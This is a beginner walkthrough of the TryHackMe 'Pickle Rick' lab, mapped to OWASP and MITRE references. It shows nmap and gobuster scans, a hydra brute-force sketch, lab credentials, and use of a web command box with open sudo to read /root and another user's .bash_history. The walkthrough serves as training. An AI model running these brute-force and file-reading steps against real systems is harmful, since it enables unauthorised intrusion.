tryhackme - pickle rick

https://tryhackme.com/room/picklerick

This box was a lot of fun due to its simplicity and lack of rabbit holes to fall down. It has a very straightforward kill chain and is a great beginner-level challenge.

Like a lot of CTFs, this box is web-app focused, so I’m going to use the opportunity to promote the amazing work of the OWASP group as I walk through the challenge. I was introduced to their Web Security Testing Guide (WSTG) during an Ethical Hacking course that I recently finished, and in an effort to continue learning and practicing a structured methodology I am going to include links and snippets throughout this write-up.

In the same spirit of learning and practice I will also include references to the Mitre ATT&CK framework where applicable.


Enumeration

Fingerprint Web Server

WSTG-INFO-02

Web server fingerprinting is the task of identifying the type and version of web server that a target is running on. While web server fingerprinting is often encapsulated in automated testing tools, it is important for researchers to understand the fundamentals of how these tools attempt to identify software, and why this is useful.

Accurately discovering the type of web server that an application runs on can enable security testers to determine if the application is vulnerable to attack. In particular, servers running older versions of software without up-to-date security patches can be susceptible to known version-specific exploits.

One of the automated testing tools referenced above is Nmap, so let’s do a quick and dirty scan of all TCP ports,

followed by a more detailed scan of the results.
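If you want to follow along, the pair of scans might look something like this (the target IP 10.10.148.132 is a placeholder - substitute whatever address TryHackMe assigns you):

  # Quick and dirty: check all 65,535 TCP ports for anything open
  nmap -p- -T4 10.10.148.132 -oN all_ports.txt

  # Detailed follow-up: run version detection and default scripts
  # against only the ports the first scan found open (e.g. 22 and 80)
  nmap -p 22,80 -sV -sC 10.10.148.132 -oN detailed.txt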

There’s not much here, which is partly what makes this such a great challenge for beginners; you only need to focus on a few things and there isn’t much chance of getting bogged down or lost.

Now that we know there is definitely a web server listening for traffic on this target, we can move on to enumerating it directly.

Review Webserver Metafiles for Information Leakage

WSTG-INFO-03

Web Spiders, Robots, or Crawlers retrieve a web page and then recursively traverse hyperlinks to retrieve further web content. Their accepted behavior is specified by the Robots Exclusion Protocol of the robots.txt file in the web root directory…

…The Disallow directive specifies which resources are prohibited by spiders/robots/crawlers.
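You don’t even need a browser to check this file; a quick curl against the web root (same placeholder IP as before) will print its contents:

  # robots.txt always lives at the web root if it exists at all
  curl http://10.10.148.132/robots.txt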

This entry leads to a ‘404 Not Found’ page, so its location in the robots file is conspicuous. If you have never watched the Rick & Morty TV show then you probably wouldn’t recognize such a strange word, but a quick search reveals that it’s a catchphrase of the show’s protagonist, Rick.

Let’s tuck this away for later.

Review Webpage Content for Information Leakage

WSTG-INFO-05

It is very common, and even recommended, for programmers to include detailed comments and metadata on their source code. However, comments and metadata included into the HTML code might reveal internal information that should not be available to potential attackers. Comments and metadata review should be done in order to determine if any information is being leaked.

On any webpage you should be able to right-click and select “View Page Source” to view the source code of the page itself.
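If you prefer the command line, something like this will surface any single-line HTML comments without opening a browser (same placeholder IP) - which happens to be exactly where the interesting tidbit on this box is hiding:

  # Fetch the homepage and print lines containing an HTML comment opener
  curl -s http://10.10.148.132/ | grep -n '<!--'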

Fingerprint Web Application Framework

WSTG-INFO-08

Web framework[*] fingerprinting is an important subtask of the information gathering process. Knowing the type of framework can automatically give a great advantage if such a framework has already been tested by the penetration tester. It is not only the known vulnerabilities in unpatched versions but specific misconfigurations in the framework and known file structure that makes the fingerprinting process so important.

You can use a browser extension such as Wappalyzer for this task.
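If you’d rather not install an extension, the HTTP response headers often leak the same details - a rough equivalent, not a replacement for Wappalyzer’s full analysis:

  # The Server and X-Powered-By headers frequently reveal the web
  # server version and the back-end language, when present
  curl -sI http://10.10.148.132/ | grep -iE '^(server|x-powered-by)'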

Let’s zoom in on this information and look at it a little more closely.

Apart from knowing which specific version of Apache is running this site (which we also got from our Nmap scan earlier), I want you to zero in on the programming language being used.

Knowing the programming language, and thus the file extension type, also helps you potentially reduce the amount of enumeration you need to do.

For example, Microsoft’s IIS web server typically serves ASP.NET applications, which use the proprietary .asp/.aspx file extensions - so if you know that your target is actually Apache then you can omit those file types from enumeration techniques such as brute-forcing the web directory (the next step below).

Enumerate Infrastructure and Application Admin Interfaces

WSTG-CONF-05

Administrator interfaces may be present in the application or on the application server to allow certain users to undertake privileged activities on the site. Tests should be undertaken to reveal if and how this privileged functionality can be accessed by an unauthorized or standard user.

As the testing guide says, there are a few different techniques for sniffing out admin interfaces, but since this is such a simple challenge we are going to brute-force the directories on the target website. You can take your pick of tools such as Dirb or Dirbuster, but I like using Gobuster; just use whatever suits you.

The syntax here is as follows (the full command is shown after this list):

gobuster: the app itself

dir: directory mode, for brute forcing web directories

-u: URL of the target

-t: threads, number of concurrent connections to attempt (if you don’t specify this then the scanner defaults to 10)

-x: extensions, list out the file extensions to test

  • based on our fingerprinting earlier we know that we need to include php but we can safely omit things like asp and thus reduce our scan time

-w: wordlist, the location of the wordlist you want to use for the brute force scanning
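Putting it all together, the command looks something like this (the wordlist path assumes a Kali-style install and the thread count is just my habit - adjust both to taste):

  gobuster dir -u http://10.10.148.132 -t 30 -x php,txt,html \
    -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt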

That /login.php page looks interesting…

But what are the login credentials?


Exploitation

Earlier we found a username in the source code of the homepage, but we don’t know what that account is for, so we move on to the next step in the testing process.

Testing for Account Enumeration and Guessable User Account

WSTG-IDNT-04

Often, web applications reveal when a username exists on system, either as a consequence of mis-configuration or as a design decision. For example, sometimes, when we submit wrong credentials, we receive a message that states that either the username is present on the system or the provided password is wrong. The information obtained can be used by an attacker to gain a list of users on system. This information can be used to attack the web application, for example, through a brute force or default username and password attack.

If we try the username we found earlier and the password of “admin” or “password” we get this error:

Good on the web devs for obfuscating which input is incorrect! This makes our testing harder - but not impossible, especially for an easy challenge like this.

See below for an example from my last write-up of what an app should NOT do.

So what IS the correct login?

Think about most beginner CTF challenges as if they were video games. What I mean is that the game developers want you to succeed and beat the game, so they purposefully design the levels and challenges in such a way as to provide you with everything you need to make progress - you just need to put the pieces together.

There’s not much to enumerate on this box so we should already have everything we need to make progress. We can safely assume that the username for the login portal is R1ckRul3s, but what about the password? We could attempt to brute-force it the same way we did the website’s directory structure (a sketch of that approach is below), but first let’s take another look at what information we’ve gathered.
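For completeness, a brute-force attempt against the portal might look roughly like this - but be warned that the form field names and the failure string here are pure assumptions that you would need to confirm by inspecting the actual login request first:

  # Hypothetical sketch only: single known username, rockyou wordlist;
  # "username", "password", and the "Invalid" failure marker must be
  # replaced with whatever the real form actually sends and returns
  hydra -l R1ckRul3s -P /usr/share/wordlists/rockyou.txt 10.10.148.132 \
    http-post-form "/login.php:username=^USER^&password=^PASS^:Invalid"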

Do you remember the robots.txt file? Do you remember what entry was there?

What if we tried R1ckRul3s:Wubbalubbadubdub for the username:password?

And we are in!

Since we are trying to be thorough let’s also call out how this app falls victim to the second application security risk in OWASP’s Top Ten.

OWASP-A2:2017-Broken Authentication

If the “admin” of this website had used multi-factor authentication then it would have stopped us from gaining access and subsequently broken our kill chain.

shame.gif

The Mitre ATT&CK framework also has some things to say about user accounts,

ATT&CK ID: T1078 - Valid Accounts

Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.

So now that we are in what do we do next?

The first thing we should do is continue exploring the app - navigate the different pages, click buttons, and generally try to understand its normal function. This is called “walking the happy path”, and if you are a beginner like me it will help you gain a better understanding not only of the system you are looking at but also of the structure of web applications in general.

We are currently on the /portal.php page so let’s take a look at the source:

There is a comment that includes what looks to be a base64-encoded string, but after spending a minute trying to decode it nothing came up. I’ll admit that I’m still very curious to know the meaning of that comment, but not enough to spend any more time digging into it.
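For reference, this is the sort of one-liner I used to test it (the string itself is redacted here as a placeholder):

  # Pipe the suspicious string into base64 -d; garbage bytes or an
  # "invalid input" error means it is not straightforward base64
  echo 'STRING_FROM_THE_COMMENT' | base64 -d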

If we click on the next page in the nav bar, Potions, we get redirected to a page called /denied.php:

The source code shows that the other pages in the nav bar also redirect to this same denied.php page, so we don’t need to spend time enumerating them further.

No other interesting comments in the code either so we can go back to the main /portal.php page.

There is an input field simply called “Commands”, and we know from our earlier enumeration that this is an Ubuntu server, so let’s try the Linux command whoami.

The response is “www-data”, which is the default account for the Apache server on Ubuntu systems. Running a command in the web GUI and seeing output from the underlying operating system means we have what is known as a web shell - the ability to execute commands on the server itself through this web page.

Let’s run “sudo -l” to see what kind of permissions have been configured for this account.

This account has what is known as “open sudo” privileges - meaning there is no password required to use the sudo command and we can do basically whatever we want. This is a massive security misconfiguration since the www-data account is meant to be confined to the Apache server itself. Flaws like this are covered in more detail in application risk number six of the OWASP Top Ten.
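I won’t reproduce the box’s exact output, but the classic signature of this problem looks like the following (a representative example, not a literal copy):

  $ sudo -l
  User www-data may run the following commands on this host:
      (ALL) NOPASSWD: ALL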

OWASP-A6:2017-Security Misconfiguration

Mitre has this to say about securing access to sudo:

ATT&CK ID: T1548.003 - Abuse Elevation Control Mechanism: Sudo and Sudo Caching

If you are interested in learning more about sudo and how it can be abused I would recommend checking out this video from Tyler Boykin who presented at this year’s Defcon conference.


With unrestricted root privileges granted to us by open sudo, this server is now what we in the industry call “completely hosed”. We can do anything we want to this box including, but not limited to:

  1. Deface the website

  2. Modify the website to serve up malware to infect visitors

  3. Install a rootkit

  4. Install a hidden backdoor

  5. Exfiltrate data and/or sensitive information

  6. Pivot to other targets in the same local network

  7. etc…

Even if the owners of the server somehow managed to regain control of it, there would always be doubt as to whether they had found everything. The only way to completely recover from this would be to rebuild the server from the ground up and hope they have good backups ¯\_(ツ)_/¯

If we run the “ls -la” command to see what is in our current directory, we find the first flag:

But if we try to look at the file with the “cat” command we get blocked.

There are other ways to view files in Linux, so try a few and see what works - a few candidates are sketched below.
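Any one of these will usually do the trick when cat is blocked (FLAG_FILE is a placeholder for whatever name the directory listing revealed):

  less FLAG_FILE       # open the file in a pager
  head FLAG_FILE       # print the first 10 lines
  tail FLAG_FILE       # print the last 10 lines
  grep . FLAG_FILE     # print every non-empty line
  strings FLAG_FILE    # print the printable strings in the file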

By the way, Mitre has some more things to say about attackers rummaging around in other people’s file systems.

ATT&CK ID: T1005 - Data from Local System

Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.

ATT&CK ID: T1083 - File and Directory Discovery

Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

Many command shell utilities can be used to obtain this information. Examples include dir, tree, ls, find, and locate. [1] Custom tools may also be used to gather file and directory information and interact with the Native API.

If we look around in the /home directory we can see a user account named ‘rick’ that looks interesting. The owner is the root account, but look at the permissions:

Even without sudo permissions we can still access this directory due to those overly broad file permissions. Inside we will find the second flag.
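For illustration, the kind of listing to look for resembles this (representative values, not a literal copy of the box’s output) - note the world-readable, -writable, and -executable bits on rick’s directory:

  $ ls -la /home
  drwxrwxrwx  2 root   root   4096 <date> rick
  drwxr-xr-x  4 ubuntu ubuntu 4096 <date> ubuntu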

What about the last flag?

If you look in the root user’s home folder you will find it there, but I’ll show you another way to view it.

Do you remember who the other user is in the home folder?

Those permissions allow us to look around inside the directory…

…and see the .bash_history file.

With its current settings only the ubuntu user can view that file, but we have open sudo privileges, remember?
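Since sudo costs us nothing here, either of these approaches will cough up the goods (FLAG_FILE is again a placeholder for whatever name the listing reveals):

  # Read another user's shell history with our free root privileges
  sudo cat /home/ubuntu/.bash_history

  # Or skip the detour and go straight to root's home folder
  sudo ls -la /root
  sudo cat /root/FLAG_FILE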

Kill Chain

So now that we’ve found the last flag, let’s go back and review the whole kill chain from start to finish:

  1. Scanned the target with Nmap and discovered a web server listening on port 80

  2. Used various fingerprinting techniques to gather information such as:

    1. Username of the web application administrator in the main page source code

    2. The administrator password in the robots file

    3. The type and version of web server running on the target

    4. The primary programming language used by the web server

  3. Brute-forced the web server’s directories to discover the admin login portal

  4. Abused the overly broad sudo permissions of the default Apache account via the app’s built-in web shell to enumerate the file system and access sensitive information on the target server